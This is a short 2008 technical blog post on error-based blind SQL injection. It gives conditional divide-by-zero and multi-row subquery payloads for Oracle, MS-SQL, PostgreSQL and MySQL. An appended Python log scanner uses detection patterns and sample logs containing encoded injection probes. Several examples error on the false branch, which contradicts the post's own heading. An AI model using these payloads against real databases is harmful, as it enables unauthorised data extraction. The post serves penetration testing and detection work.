If Query Data Manipulation

May 26, 2008

Occasionally when exploiting SQL injection there are situations where the application does not show different pages for the true and false results of the injected query. If the database server does not resolve host names (which rules out out-of-band attacks), the usual way to exploit such conditions is to use functions such as 'waitfor delay', which make the database sleep for a specified number of seconds. A true condition therefore returns the output after a delay, whereas a false condition results in a prompt response.

In some cases the application returns different output (or an error) if the SQL query is syntactically wrong or raises an error. In these conditions, instead of carrying out time-based attacks, one can use conditional (IF/CASE) statements to manipulate the SQL query so that it only errors for one outcome of the condition.

The following queries return a divide-by-zero error when the condition is true:-

Oracle:-

select case when user='SYS' then 1/0 else (select 1 from dual) end from dual 

MS-SQL :-

if ((select user) = 'sa' OR (select user) = 'dbo') select 1/0 else select 1 

update:- select case when (1=1) then 1 else 1/0 end

POSTGRES :-

SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END;

update:- (select case when (1=1) then 1 else (1 * (select 1 from information_schema.tables)) end)=1

MY-SQL:- 

Doesn't work. Careful: there is a denial-of-service bug in IF query handling which kills the database in old versions.

update:- (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end)=1

returns the error 'multiple rows returned by subquery' when the condition is false
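From the defender's side, the probes above leave a recognisable footprint in web server logs: a CASE/IF expression whose only purpose is to divide by zero, to force a multi-row subquery, or to sleep. The following Python is an added example (not from the original post) that flags such requests in constructed Apache-style log lines; the log lines, IP addresses and URL paths are made up for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe styles discussed above: a CASE/IF that only errors
# (divide by zero, multi-row subquery) or sleeps when the guessed condition holds.
PROBE_PATTERNS = {
    "conditional_divide_by_zero": re.compile(
        r"\b(?:case\s+when|if\s*\().*?\b1\s*/\s*0\b", re.I | re.S),
    "conditional_multirow_subquery": re.compile(
        r"\bcase\s+when\b.*?\(\s*select\b.*?\binformation_schema\.tables\b", re.I | re.S),
    "time_delay": re.compile(
        r"\bwaitfor\s+delay\b|\bpg_sleep\s*\(|\bsleep\s*\(", re.I),
}

def classify_query_string(query_string):
    """Return the names of probe signatures found in a URL query string.

    The string is percent-decoded twice so that a double-encoded payload
    (%2527 for a quote, for example) is inspected in decoded form as well.
    """
    decoded = unquote_plus(unquote_plus(query_string))
    return [name for name, pat in PROBE_PATTERNS.items() if pat.search(decoded)]

# Apache combined-format request line: client, ident, user, [timestamp], "METHOD target"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+)')

def scan_access_log(lines):
    """Return (client_ip, request_target, [signatures]) for each request carrying a probe."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or "?" not in m.group(3):
            continue
        ip, _timestamp, target = m.groups()
        hits = classify_query_string(target.split("?", 1)[1])
        if hits:
            findings.append((ip, target, hits))
    return findings

# Constructed sample log (not real traffic); "%3D" is a URL-encoded "=".
SAMPLE_LOG = [
    '10.0.0.5 - - [26/May/2008:10:01:02 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [26/May/2008:10:01:05 +0000] "GET /item.php?id=1+and+(select+case+when+(user%3D\'SYS\')+then+1/0+else+1+end+from+dual)%3D1 HTTP/1.1" 500 120',
    '10.0.0.9 - - [26/May/2008:10:02:11 +0000] "GET /item.php?id=1;waitfor+delay+\'0:0:5\'-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [26/May/2008:10:02:40 +0000] "GET /item.php?id=1+and+(select+case+when+(1%3D2)+then+1+else+1*(select+table_name+from+information_schema.tables)+end)%3D1 HTTP/1.1" 500 120',
]

if __name__ == "__main__":
    for ip, target, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits, target)
```

Correlating the flagged requests with the response status (500 on the error-based probes, or an unusually long response time on the delay probe) confirms whether the application actually leaks the condition.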

— 

Thanks pentestmonkey for providing some useful queries 
